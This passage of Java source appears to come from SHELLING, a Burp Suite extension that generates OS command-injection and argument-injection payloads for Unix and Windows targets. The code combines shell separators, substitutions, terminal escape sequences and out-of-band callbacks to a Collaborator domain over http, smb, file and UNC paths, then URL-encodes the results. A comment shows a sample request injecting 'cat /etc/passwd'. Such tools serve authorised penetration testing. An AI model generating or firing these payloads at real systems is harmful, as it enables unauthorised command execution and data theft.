this.nixArgumentSeparators.add("$IFS$9"); // $IFS$9
this.winCommandSeparators.add(this.byteToString((byte)0x1a));
this.winArgumentSeparators.add(this.byteToString((byte)0x0b));
this.winArgumentSeparators.add("%25ProgramFiles:~10,1%25");
this.winEchoArgumentSeparators.add("(");
this.winEchoArgumentSeparators.add(".");
this.winCommandSeparators.add(this.byteToString((byte)0x26)+"::");
if("nix".equals(targetOS)||"all".equals(targetOS))
{
this.basePayloads.add("$("+nixPayload+")");
this.basePayloads.add("`"+nixPayload+"`");
if(this.secondArgument=="")
{
this.basePayloads.add("{"+command+","+argument+"}");// the brace operator
}
else
{
this.basePayloads.add("{"+command+","+argument+","+secondArgument+"}");// the brace operator
}
for(int i=0;i<this.nixCommandSeparators.size();i++)
{
this.commandSeparators.add(this.nixCommandSeparators.get(i));
}
for(int i=0;i<this.nixArgumentSeparators.size();i++)
{
this.argumentSeparators.add(this.nixArgumentSeparators.get(i));
}
}
if("win".equals(targetOS)||"all".equals(targetOS))
{
this.basePayloads.add(winPayload);
for(int i=0;i<this.winCommandSeparators.size();i++)
{
this.commandSeparators.add(this.winCommandSeparators.get(i));
}
for(int i=0;i<this.winArgumentSeparators.size();i++)
{
this.argumentSeparators.add(this.winArgumentSeparators.get(i));
}
}
// so, the OS-specific command terminators are not propagated to commandTerminators yet (and I have an impression like they should be)
//
if("win".equals(targetOS)||"all".equals(targetOS))
{
for(int i=0;i<winCommandTerminators.size();i++)
{
this.commandTerminators.add(winCommandTerminators.get(i)); //
}
}
if("nix".equals(targetOS)||"all".equals(targetOS))
{
for(int i=0;i<nixCommandTerminators.size();i++)
{
this.commandTerminators.add(nixCommandTerminators.get(i)); //
}
}
// automatically prefix prefixes with quotes in order to gain quoted injection compatibility
ArrayList<String> tmpPrefixes=new ArrayList<>();
tmpPrefixes=(ArrayList<String>)prefixes.clone();
for(int i=0;i<tmpPrefixes.size();i++)
{
for(int j=0;j<prefixSuffixes.size();j++)
{
prefixes.add(tmpPrefixes.get(i)+this.prefixSuffixes.get(j));
}
}
//1. DO ARGUMENT INJECTIONS HERE
if(this.tab.shellingPanel.argInjectionCheckBox.isSelected())
{
this.generateArgumentInjectionPayloads();
}
// 2. TERMINAL INJECTIONS TO FOLLOW
if(this.tab.shellingPanel.doTerminalInjection.isSelected())
{
this.generateTerminalInjectionPayloads();
}
// 3. COMMAND INJECTION NOW
if(this.tab.shellingPanel.doCommandInjection.isSelected())
{
this.generateCommandInjectionPayloads();
}
// OK, what's left now is the output encoding + payload marking
this.encodeOutput();
// update the payload counter
this.tab.shellingPanel.jTabbedPane1.setTitleAt(5,"Save "+this.shellings.size()+" payloads");
}
private void generateTerminalInjectionPayloads()
{
/*
curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
%1b%5d%32%3b + MALICIOUS COMMAND + %07%0a
*/
byte[] prefix={(byte)0x1b,(byte)0x5d,(byte)0x32,(byte)0x3b};
byte[] suffix={(byte)0x07,(byte)0x0a};
for(int i=0;i<this.argumentSeparators.size();i++)
{
for(int j=0;j<this.basePayloads.size();j++)
{
String myCurrPayload=this.basePayloads.get(j);
if(this.incompatibleTargets(this.argumentSeparators.get(i), myCurrPayload, "separator"))
{
continue;
}
myCurrPayload=myCurrPayload.replace("ARGUMENT_SEPARATOR",this.argumentSeparators.get(i));
this.shellings_raw.add(this.callbacks.getHelpers().bytesToString(prefix)+myCurrPayload+this.callbacks.getHelpers().bytesToString(suffix));
}
}
}
private void generateCommandInjectionPayloads()
{
// 1) First, we fill our output payloads list wth all variations of base payloads, including different argument separators
if(this.tab.shellingPanel.basePayloadCheckBox.isSelected()==true)
{
for(int i=0;i<this.argumentSeparators.size();i++)
{
for(int j=0;j<this.basePayloads.size();j++)
{
String myCurrPayload=this.basePayloads.get(j);
if(this.incompatibleTargets(this.argumentSeparators.get(i), myCurrPayload, "separator"))
{
continue;
}
myCurrPayload=myCurrPayload.replace("ARGUMENT_SEPARATOR",this.argumentSeparators.get(i));
if(!this.shellings_raw.contains(myCurrPayload)) this.shellings_raw.add(myCurrPayload);
}
}
this.basePayloads=(ArrayList<String>)this.shellings_raw.clone(); // overwrite the base with different base command_separator variants
}
// 2) MALICIOUS_COMMAND+COMMAND_TERMINATOR
if(this.tab.shellingPanel.secondBasePayloadCheckBox.isSelected())
{
for(int i=0;i<this.basePayloads.size();i++)
{
for(int j=0;j<this.commandTerminators.size();j++)
{
if(this.incompatibleTargets(this.commandTerminators.get(j),this.basePayloads.get(i), "terminator"))
{
continue;
}
String currPayload=this.basePayloads.get(i)+this.commandTerminators.get(j);
if(!this.shellings_raw.contains(currPayload)) this.shellings_raw.add(currPayload);
}
for(int j=0;j<this.commandSeparators.size();j++)
{
if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i), "separator"))
{
continue;
}
if(!this.shellings_raw.contains(this.basePayloads.get(i)+this.commandSeparators.get(j))) this.shellings_raw.add(this.basePayloads.get(i)+this.commandSeparators.get(j));
}
}
}
// 3) COMMAND_SEPARATOR+MALICIOUS_COMMAND
if(this.tab.shellingPanel.thirdBasePayloadCheckBox.isSelected()==true)
{
for(int i=0;i<this.basePayloads.size();i++)
{
for(int j=0;j<this.commandSeparators.size();j++)
{
if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
{
continue;
}
if(!this.shellings_raw.contains(this.commandSeparators.get(j)+this.basePayloads.get(i))) this.shellings_raw.add(this.commandSeparators.get(j)+this.basePayloads.get(i));
}
}
}
// 4) COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR
// I think this makes the above section 3) redundant, because:
// - if the application is appending our payload with something, 3) will fail, while 4) will work
// - if the application is not accepting COMMAND_SEPARATOR, both variants will fail, so 3) is not helping anyway
// - if the application is rejecting values that do not end with alphanum (which is how any of our MALICIOUS_COMMANDS would end), 4) will fail - but this is why we have the + SUFFIX variant - 5) - right?
if(this.tab.shellingPanel.fourthBasePayloadCheckBox.isSelected()==true)
{
for(int i=0;i<this.basePayloads.size();i++)
{
for(int j=0;j<this.commandSeparators.size();j++)
{
if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
{
continue;
}
//this.shellings_raw.add(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j));
if(!this.shellings_raw.contains(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j))) this.shellings_raw.add(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j));
}
}
}
// 5) COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX
if(this.tab.shellingPanel.fifthBasePayloadCheckBox.isSelected())
{
for(int i=0;i<this.basePayloads.size();i++)
{
for(int j=0;j<this.commandSeparators.size();j++)
{
if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
{
continue;
}
for(int k=0;k<this.prefixes.size();k++)
{
String suffix=this.prefixes.get(k);
if(suffix=="'"||suffix=="")
{
continue; //skip irrelevant payloads
}
if(!this.shellings_raw.contains(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j)+suffix)) this.shellings_raw.add(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j)+suffix);
}
}
}
}
// 6) PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR
if(this.tab.shellingPanel.sixthBasePayloadCheckBox.isSelected())
{
for(int i=0;i<this.basePayloads.size();i++)
{
for(int j=0;j<this.commandSeparators.size();j++)
{
if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
{
continue;
}
for(int k=0;k<this.prefixes.size();k++)
{
String currPayload=this.prefixes.get(k)+this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j);
if(currPayload.contains("'"))
{
currPayload=currPayload+"'";
}
else if(currPayload.contains("\""))
{
currPayload=currPayload+"\"";
}
if(!this.shellings_raw.contains(currPayload)) this.shellings_raw.add(currPayload);
}
}
}
}
// 7) PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX
if(this.tab.shellingPanel.seventhBasePayloadCheckBox.isSelected())
{
for(int i=0;i<this.basePayloads.size();i++)
{
for(int j=0;j<this.commandSeparators.size();j++)
{
if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
{
continue;
}
for(int k=0;k<this.prefixes.size();k++)
{
String suffix=this.getProperSuffix(this.prefixes.get(k));
if(!this.shellings_raw.contains(this.prefixes.get(k)+this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j)+suffix)) this.shellings_raw.add(this.prefixes.get(k)+this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j)+suffix);
}
}
}
}
// 8) PREFIX+MALICIOUS_COMMAND+SUFFIX for substitutions - `CMD` and $(CMD)
for(int i=0;i<this.basePayloads.size();i++)
{
for(int j=0;j<this.prefixes.size();j++)
{
String basePayload=this.basePayloads.get(i);
if(!basePayload.startsWith("$")&&!basePayload.startsWith("`"))
{
continue;
}
String prefix=this.prefixes.get(j);
String suffix=this.getProperSuffix(prefix);
if(!this.shellings_raw.contains(prefix+basePayload+suffix)) this.shellings_raw.add(prefix+basePayload+suffix);
}
}
}
private void generateArgumentInjectionPayloads()
{
if(this.tab.shellingPanel.feedbackChannel!="DNS") return; // return quietly (at the moment this feature is only available while using DNS as the feedback chan)
argInjectionArguments=new ArrayList<String>();
String domain="BURP_COLLAB_DOMAIN";
if(payloadMarking)
{
domain="PAYLOAD_MARK."+domain;
}
if(this.tab.shellingPanel.injectHTTPCheckBox.isSelected())
{
argInjectionArguments.add("http://"+domain+"/PAYLOAD_MARK");
}
if(this.tab.shellingPanel.injectSmbCheckBox.isSelected())
{
argInjectionArguments.add("smb://"+domain+"/PAYLOAD_MARK");
}
if(this.tab.shellingPanel.injectFileCheckBox.isSelected())
{
argInjectionArguments.add("file://"+domain+"/PAYLOAD_MARK");
}
if(this.tab.shellingPanel.uncPathsCheckBox.isSelected()&&this.targetOS!="nix") // "win" or "all"
{
argInjectionArguments.add("\\\\"+domain+"\\PAYLOAD_MARK");
}
// this method fills the shellings_raw() structure with argument injection payloads
// implemented to make Argument injection independent from Command injection (so either of the attacks or both can be enabled)
// also, the class constructor is getting too big
/*
soon to be implemented, temporarily commented out
if(command.equals("echo"))
{
for(int i=0;i<this.winEchoArgumentSeparators.size();i++)
{
this.argumentSeparators.add(this.winEchoArgumentSeparators.get(i));
this.winArgumentSeparators.add(this.winEchoArgumentSeparators.get(i));
}
}
*/
// 0# BEFORE-FIRST METHOD
if(this.tab.shellingPanel.injectAdditionalArguments.isSelected())
{
// iterate over argument separators
String myCurrPayload="";
for(int i=0;i<this.argumentSeparators.size();i++)
{
// iterate over prefixes
for(int j=0;j<this.prefixes.size();j++)
{
// iterate over terminators
// we use command terminators as argument terminators here - should work the same (e.g. nullbyte, one-line comment, poo)
// could also do PREFIX + ARGUMENT + TERMINATOR variant straig away instead of PREFIX + SEPARATOR + ARGUMENT + TERMINATOR
// but I assume all direct injections like ARGUMENT whereas ARGUMENT is e.g. http://BURP_COLLAB_DOMAIN are detected by the Scanner anyway
// so it would be rather redundant, however is required for exported payload sets
// hence it deserves a separate checkbox in the UI (not implemented yet)
myCurrPayload=this.prefixes.get(j)+this.argumentSeparators.get(i);
for(int k=0;k<this.argInjectionArguments.size();k++)
{
// iterate over protocols (arguments to inject)
this.shellings_raw.add(myCurrPayload+this.argInjectionArguments.get(k));
// does not matter, terminators should be empty if this box was not selected
//if(this.tab.shellingPanel.useTerminatorsCheckBox.isSelected())
//{
for(int l=0;l<this.commandTerminators.size();l++)
{
this.shellings_raw.add(myCurrPayload+this.argInjectionArguments.get(k)+this.commandTerminators.get(l));
}
//}
}
}
}
}
// 1# FIRST METHOD
// this should be turned into a set of pickable profiles, e.g. wget, ping, ls
// GET /test_cases/GET/arginj_escape_shell_cmd.php?dir='*'%20-exec%20cat%20/etc/passwd%20\; HTTP/1.1
// which, as we find out, does not make any sense, since it requires a semicolon to be allowed - which is a command separator, we would not need arg injection
// if this was working
//
// we still WANT our windows things:
// /c
// OK here it is implemented, our UNC thingy!
// > UNC thingy :D
if(this.tab.shellingPanel.uncPathsCheckBox.isSelected())
{
// iterate over prefixes
String myPayload=">\\\\"+domain+"\\PAYLOAD_MARK";
for(int j=0;j<this.prefixes.size();j++)
{
this.shellings_raw.add(this.prefixes.get(j)+myPayload); // add non-terminated version
String suffix=this.getProperSuffix(this.prefixes.get(j));
for(int l=0;l<this.commandTerminators.size();l++)
{
// now, implement the literal nullbyte check
// if(this.commanTerminators)
// OK, there is no way to do this here
// unless we move the encoding layer from the end to the basic payload building chars layer (like in psychoPATH)
// we'd have to implement this in encodeOutput() instead
this.shellings_raw.add(this.prefixes.get(j)+myPayload+this.commandTerminators.get(l));
this.shellings_raw.add(this.prefixes.get(j)+myPayload+suffix+this.commandTerminators.get(l)); // let's see what happens
}
}
}
// OK, so find is immune to this
// how about wget --execute command http://URL?
//
// #2 SECOND METHOD
if(this.tab.shellingPanel.bruteArgInjections.isSelected())
{
// this should be customised (so users can provide their own flags array (string)
if(this.tab.shellingPanel.defaultArgBruteRange.isSelected()==false) // this means the other one is true
{
this.letters=this.tab.shellingPanel.customCharacterRange.getText();
}
String myCurrPayload="";
for(int i=0;i<this.argumentSeparators.size();i++)
{
// iterate over prefixes
for(int j=0;j<this.prefixes.size();j++)
{
// iterate over terminators
// we use command terminators as argument terminators here - should work the same (e.g. nullbyte, one-line comment, poo)
// could also do PREFIX + ARGUMENT + TERMINATOR variant straig away instead of PREFIX + SEPARATOR + ARGUMENT + TERMINATOR
// but I assume all direct injections like ARGUMENT whereas ARGUMENT is e.g. http://BURP_COLLAB_DOMAIN are detected by the Scanner anyway
// so it would be rather redundant, however is required for exported payload sets
// hence it deserves a separate checkbox in the UI (not implemented yet)
myCurrPayload=this.prefixes.get(j)+this.argumentSeparators.get(i);
for(int l=0;l<letters.length();l++)
{
for(int k=0;k<this.argInjectionArguments.size();k++)
{
// iterate over protocols (arguments to inject)
if(targetOS=="win"||targetOS=="all")
{
this.shellings_raw.add(myCurrPayload+"/"+letters.charAt(l)+this.argumentSeparators.get(i)+this.argInjectionArguments.get(k));
for(int m=0;m<this.commandTerminators.size();m++)
{
this.shellings_raw.add(myCurrPayload+"/"+letters.charAt(l)+this.argumentSeparators.get(i)+this.argInjectionArguments.get(k)+this.commandTerminators.get(m));
}
}
if(targetOS=="nix"||targetOS=="all")
{
this.shellings_raw.add(myCurrPayload+"-"+letters.charAt(l)+this.argInjectionArguments.get(k));
for(int m=0;m<this.commandTerminators.size();m++)
{
this.shellings_raw.add(myCurrPayload+"-"+letters.charAt(l)+this.argInjectionArguments.get(k)+this.commandTerminators.get(m));
}
}
}
}
}
}
}
}
private void encodeOutput()
{
// now we have to deal with the output encodings
ListModel encodeModel = this.tab.shellingPanel.encodeList.getModel();
for(int j=0;j<this.shellings_raw.size();j++)
{
for(int i=0;i<encodeModel.getSize();i++)
{
// check for nullbytes and skip them if the setting says so (only applicable here, for none)
if("None".equals(encodeModel.getElementAt(i).toString()))
{
// baddies avoidance
// includeWhites is selected AND the smart mode is on AND (the last response was 400 AND the payload contained such a char)
// last check remaining is the 400 status to avoid race conditions (this info has to be held in each scanner instance separately
// and somehow retrieved in this function so we know when to perform the avoidance
if(mode=="scanner"&&this.tab.shellingPanel.includeLiteralWhites.isSelected()==false&&this.tab.shellingPanel.smart400Avoidance.isSelected()==true)
{
byte[] tmp = this.callbacks.getHelpers().stringToBytes(this.shellings_raw.get(j));
if(this.tab.shellingPanel.containsBaddies(tmp))
{
continue; // skip to the next encodeModel
}
}
String outputPayload=this.getMarkedVersion(this.shellings_raw.get(j));
this.shellings.add(outputPayload);
}
if("URL".equals(encodeModel.getElementAt(i).toString())) // URL encode
{
String outputPayload=this.getMarkedVersion(this.shellings_raw.get(j));
try {
this.shellings.add(URLEncoder.encode(outputPayload,StandardCharsets.UTF_8.toString()));
}
catch (UnsupportedEncodingException ex) {
Logger.getLogger(IntruderPayloadGenerator.class.getName()).log(Level.SEVERE, null, ex);
}
}
if("Double URL".equals(encodeModel.getElementAt(i).toString()))
{
String outputPayload=this.getMarkedVersion(this.shellings_raw.get(j));
try {
this.shellings.add(URLEncoder.encode(URLEncoder.encode(outputPayload,StandardCharsets.UTF_8.toString())));
}
catch (UnsupportedEncodingException ex) {
Logger.getLogger(IntruderPayloadGenerator.class.getName()).log(Level.SEVERE, null, ex);
}
}
}
}
}
// search the current collabSession, matching by the domain name
// set the base IHttpRequestResponse so it can be retrieved later on if an interaction is hit
public boolean setBase(IHttpRequestResponse base)
{
boolean ret = false;
for(int i=this.tab.shellingPanel.collabSessions.size()-1;i>-1;i--)
{
if(this.tab.shellingPanel.collabSessions.get(i).collabLoc==this.loc)
{
ret=true;
this.tab.shellingPanel.collabSessions.get(i).setReqResp(base);
}
}
return ret;
}
private String getMarkedVersion(String payload)
{
cnt++;
if(this.payloadMarking)
{
String replacement=cnt.toString();
if(payload.contains("$IFS$9")) // if dealing with $IFS$9
{
replacement="a"+replacement;
}
payload=payload.replace("PAYLOAD_MARK",replacement);
}
else
{
payload=payload.replace("PAYLOAD_MARK","");
}
return payload;
}
private String byteToString(byte inputByte)
{
byte[] t = new byte[1];
t[0]=inputByte;
return callbacks.getHelpers().bytesToString(t);
}
private boolean arraySearch(String needle, String[] hayStack)
{
for(int i=0;i<hayStack.length;i++)
{
if(hayStack[i]==needle) return true;
}
return false;
}
private String[] toStringArray(ArrayList<String> input)
{
String ret[];
ret = new String[input.size()];
for(int i=0;i<ret.length;i++)
{
ret[i]=input.get(i);
}
return ret;
}
private boolean incompatibleTargets(String entity, String payload, String what)
{
if(targetOS!="all") return false; // it's either strictly win or nix - in such case there should be no incompatible elements in the configuration in the first place
// this might become false if we allow people to play with the the separators themselves (define their own ones)
// in such case we'll remove this lind and perform the check every time this function is called
// we discover the OS based on the existence of an OS-specific separator (ARGUMENT SEPARATOR)
// matching does not work as we would like it to
// we're gonna do some string carving instead
// 1. we want to find the first occurrence (indexOf) the command
// 2. we went to find the first occurrence (indexOf) of the argument
// 3. we carve out [indexOfargument..indexOfCommand+commandLength] and we have our command separator
//String cmdPattern = command+"(.*)"+argument;
String separator="";
//Pattern pattern = Pattern.compile(cmdPattern);
//Matcher matcher = pattern.matcher(payload);
//this.tab.shellingPanel.logOutput("Matching "+payload+" against "+cmdPattern+"\n");
//if(matcher.matches())
if(payload.contains(command)&&payload.contains(argument))
{
int commandIndexOf = payload.indexOf(command);
int argumentIndexOf = payload.indexOf(argument);
if(commandIndexOf<argumentIndexOf) //
{
separator=payload.substring(commandIndexOf+command.length(),argumentIndexOf);
}
else // won't happen with the way payloads are generated atm
{
separator=payload.substring(argumentIndexOf+argument.length(),commandIndexOf);
}
//this.tab.shellingPanel.logOutput("Separator extracted: "+separator);
}
else
{
this.tab.shellingPanel.logOutput("Warning: the "+payload+" payload does not contain the "+command+" command and/or the "+argument+" argument.\nArgument separator could not be determined.\n");
separator="";
}
// whether the payload seems nix-like
if(payload.contains("`")||payload.contains("$")||arraySearch(separator,this.toStringArray(this.nixArgumentSeparators)))
{
if("separator".equals(what))
{
if(arraySearch(entity,this.toStringArray(this.winArgumentSeparators)))
{
return true;
}
if(arraySearch(entity,this.toStringArray(this.winCommandSeparators)))
{
return true;
}
return false;
}
if("terminator".equals(what))
{
if(arraySearch(entity,this.toStringArray(this.winCommandSeparators)))
{
return true;
}
return false;
}
return false;
}
if(arraySearch(separator,this.toStringArray(winArgumentSeparators))) // dealing with windows
{
if("separator".equals(what))
{
if(arraySearch(entity,this.toStringArray(this.nixCommandSeparators)))
{
return true;
}
if(arraySearch(entity,this.toStringArray(this.nixArgumentSeparators)))
{
return true;
}
return false;
}
if("terminator".equals(what))
{
if(arraySearch(entity,this.toStringArray(this.nixCommandTerminators)))
{
return true;
}
return false;
}
}
return false;
}
private String getProperSuffix(String prefix)
{
String suffix=prefix;
if(prefix.contains("'"))
{
suffix=suffix.replace("'","");
suffix="'"+suffix;
}
else if(prefix.contains("\""))
{
suffix=suffix.replace("\"","");
suffix="\""+suffix;
}
return suffix;
}
@Override
public boolean hasMorePayloads()
{
if(this.payloadIndex < this.shellings.size()) return true;
// also, update the label with the latest counter
this.tab.shellingPanel.jTabbedPane1.setTitleAt(5,"Save "+this.shellings.size()+" payloads");
// we ran out of payloads, return false just after checking for any collaborator interactions
// save the payloads
// find the ID (don't use the public counter to avoid race conditions)
// and save the payloads
if(this.mode=="auto")
{
for(int i=this.tab.shellingPanel.collabSessions.size()-1;i>-1;i--)
{
if(this.tab.shellingPanel.collabSessions.get(i).collabLoc==this.loc)
{
this.tab.shellingPanel.collabSessions.get(i).setShellingsRaw(this.shellings); // save the payloads in the session tracker
break;
}
}
}
// while this check is done always (we might be in manual mode but still receive asynchronous feedback from the auto mode)
this.tab.shellingPanel.checkCollabInteractions(false);
return false;
}
public String getPayload(int index)
{
if(index<this.shellings.size()) return this.shellings.get(index);
return "";
}
public byte[] getNextPayloadSmart(byte[] baseValue, boolean last400Avoid) // used by the scanner
{
this.last400Avoid=last400Avoid;
return getNextPayload(baseValue);
}
@Override
public byte[] getNextPayload(byte[] baseValue)
{
// so, if we want to introduce smart 400 avoidance for both Scanner and Intruder, we need to be able to:
// 1) modify the getNextPayload() method so it skips all the payloads with known bad chars (while still incrementing the index)
// and returns the next valid payload
// 2) find out from the getNextPayload method that:
// a) Smart 400 avoidance is on
// b) we have just encountered 400-s in result of sending requests containing those chars (beware of race conditions)
// so we need two public properties
// avoidance is on (can be read from the constructor once the instance is started)
// last response was 400 AND the payload contained a whitechar (this is the problem, how can I know Intruder returned 400? I only generate payloads...
//
if("mark".equals(this.payloadType))
{
this.payloadIndex++;
return callbacks.getHelpers().stringToBytes(Integer.toString(this.payloadIndex));
}
if("cmd".equals(this.payloadType))
{
// a loop has to be introduced here to allow skipping baddies once 400s are detected
while(this.hasMorePayloads())
{
String p = this.shellings.get(this.payloadIndex);
byte[] payload = payload = callbacks.getHelpers().stringToBytes(p);
if(this.last400Avoid==true) // whether HTTP 400 avoidance is enabled, we can do this before the BURP_COLLAB_DOMAIN and PREFIX_HOLDER substitution
{
// search the payload and skip if baddies found
// yeah payloads are pre-generated
// but later on we selectively skip some of them from being provided to Intruder/Scanner
// which both do not know how many payloads will be returned
// thus they rely on the hasMorePayloads() loop and getNextPayload() method.
if(this.tab.shellingPanel.containsBaddies(payload))
{
// skip this payload and continue
if(this.tab.shellingPanel.verboseOutput==true)
{
this.tab.shellingPanel.logOutput("Skipped payload "+Integer.toString(this.payloadIndex)+" due to baddies detection.");
}
this.payloadIndex++;
continue;
}
}
if(p.contains("PREFIX_HOLDER"))
{
String base = callbacks.getHelpers().bytesToString(baseValue);
p=p.replace("PREFIX_HOLDER",base);
}
if(p.contains("BURP_COLLAB_DOMAIN"))
{
if(tab.shellingPanel.feedbackChannel=="DNS")
{
p=p.replace("BURP_COLLAB_DOMAIN",loc);
}
else
{
if(this.action!="export"&&this.payloadIndex==0) // prevent a nasty flood of messages, also do not issue this warning when doing export - someone might want to use the holder and replace it manually later
{
JOptionPane.showMessageDialog(null, "WARNING: the payload contains the BURP_COLLAB_DOMAIN special holder used with DNS feedback channel. However, the current feedback channel is "+tab.shellingPanel.feedbackChannel+". You are most likely doing it wrong.", "Argument <-> feedback channel missmatch!", JOptionPane.INFORMATION_MESSAGE);
}
}
//this.shellings.get(this.payloadIndex).replace("BURP_COLLAB_DOMAIN", loc);
}
this.shellings.set(this.payloadIndex,p); // update the payload with the result of the substitution
this.payloadIndex++;
return callbacks.getHelpers().stringToBytes(p);
}
return new byte[0]; // if no more valid payloads are found (Smart 400 avoidance), we simply return this byte[0] (we have to, as the DoScannerCheck class was already told that we have more payloads)
}
return null; // should never happen (unreachable statement, but required by Java)
}
@Override
public void reset()
{
payloadIndex = 0;
}
}
================================================
FILE: Java/src/uk/co/pentest/SHELLING/IntruderPayloadGeneratorByte.java
================================================
package uk.co.pentest.SHELLING;
import burp.BurpExtender;
import burp.IBurpExtenderCallbacks;
import burp.IIntruderPayloadGenerator;
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.swing.ListModel;
/**
*
* @author ewilded
*/
public final class IntruderPayloadGeneratorByte implements IIntruderPayloadGenerator
{
int payloadIndex; // counter for the payload mark
byte[] bytes_raw; // byte payloads
ArrayList<String> bytes_out; //
IBurpExtenderCallbacks callbacks = BurpExtender.getBurpCallbacks();
ShellingTab tab;
public IntruderPayloadGeneratorByte(ShellingTab tab)
{
this.tab=tab;
int byteIndex=0;
this.bytes_out=new ArrayList<>();
/*
"non-alpha";
"alpha";
"non-alpha-print";
"non-alpha-non-print";
"all";
*/
// this.bytes_raw=new ArrayList<>();
//
if("non-alpha".equals(this.tab.shellingPanel.byteGeneratorRange))
{
this.bytes_raw = new byte[194];
// 0-47 48
// 58-64 7
// 91-96 6
// 123-255 133
// 194 all together
for(int i=0;i<48;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=58;i<65;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=91;i<97;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=123;i<256;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
}
if("alpha".equals(this.tab.shellingPanel.byteGeneratorRange))
{
// 48-57 -> 10
// 65-90 -> 26
// 97-122 -> 26
// 62 altogether
this.bytes_raw = new byte[62];
for(int i=48;i<58;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=65;i<91;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=97;i<123;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
}
if("non-alpha-print".equals(this.tab.shellingPanel.byteGeneratorRange))
{
// 33-46 -> 14
// 58-64 -> 7
// 91-96 -> 6
// 123-126 -> 4
// 31 all together
this.bytes_raw = new byte[31];
for(int i=33;i<47;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=58;i<65;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=91;i<97;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=123;i<127;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
}
if("non-alpha-non-print-low".equals(this.tab.shellingPanel.byteGeneratorRange))
{
// 0-31 -> 32
// 127-128 -> 1
// alltogether 33
this.bytes_raw = new byte[33];
for(int i=0;i<32;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=127;i<128;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
}
if("non-alpha-non-print".equals(this.tab.shellingPanel.byteGeneratorRange))
{
// 0-31 -> 32
// 127-255 -> 129
// alltogether 161
this.bytes_raw = new byte[161];
for(int i=0;i<32;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
for(int i=127;i<256;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
}
if("all".equals(this.tab.shellingPanel.byteGeneratorRange))
{
// 0-255 -> 256
this.bytes_raw = new byte[256];
for(int i=0;i<256;i++)
{
bytes_raw[byteIndex]=(byte)i;
byteIndex++;
}
}
// now, check what the encodings are - and fill the bytes_out string array accordingly
ListModel encodeModel = this.tab.shellingPanel.encodeList.getModel();
for(int j=0;j<this.bytes_raw.length;j++)
{
byte[] t = new byte[1];
t[0]=this.bytes_raw[j];
String convertedBytes = callbacks.getHelpers().bytesToString(t);
for(int i=0;i<encodeModel.getSize();i++)
{
if("None".equals(encodeModel.getElementAt(i).toString()))
{
this.bytes_out.add(convertedBytes); // add the conversion here
}
if("URL".equals(encodeModel.getElementAt(i).toString())) // URL encode
{
try
{
this.bytes_out.add(URLEncoder.encode(convertedBytes,StandardCharsets.UTF_8.toString()));
}
catch (UnsupportedEncodingException ex)
{
Logger.getLogger(IntruderPayloadGeneratorByte.class.getName()).log(Level.SEVERE, null, ex);
}
}
if("Double URL".equals(encodeModel.getElementAt(i).toString()))
{
try
{
this.bytes_out.add(URLEncoder.encode(URLEncoder.encode(convertedBytes,StandardCharsets.UTF_8.toString())));
}
catch (UnsupportedEncodingException ex)
{
Logger.getLogger(IntruderPayloadGeneratorByte.class.getName()).log(Level.SEVERE, null, ex);
}
}
}
}
}
@Override
public boolean hasMorePayloads()
{
//this.tab.shellingPanel.logOutput("Being asked for more payloads (payloadIndex:"+this.payloadIndex+" with size: "+this.bytes_out.size());
return this.payloadIndex < this.bytes_out.size();
}
@Override
public byte[] getNextPayload(byte[] baseValue)
{
byte[] payload;
payload = this.callbacks.getHelpers().stringToBytes(this.bytes_out.get(this.payloadIndex).toString());
//
this.payloadIndex++; // increase the index
return payload;
}
@Override
public void reset()
{
this.payloadIndex = 0;
}
}
================================================
FILE: Java/src/uk/co/pentest/SHELLING/PayloadFactory.java
================================================
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package uk.co.pentest.SHELLING;
import burp.IHttpRequestResponse;
import burp.IIntruderAttack;
import burp.IIntruderPayloadGenerator;
import burp.IIntruderPayloadGeneratorFactory;
/*
* @author ewilded
*/
public class PayloadFactory implements IIntruderPayloadGeneratorFactory{
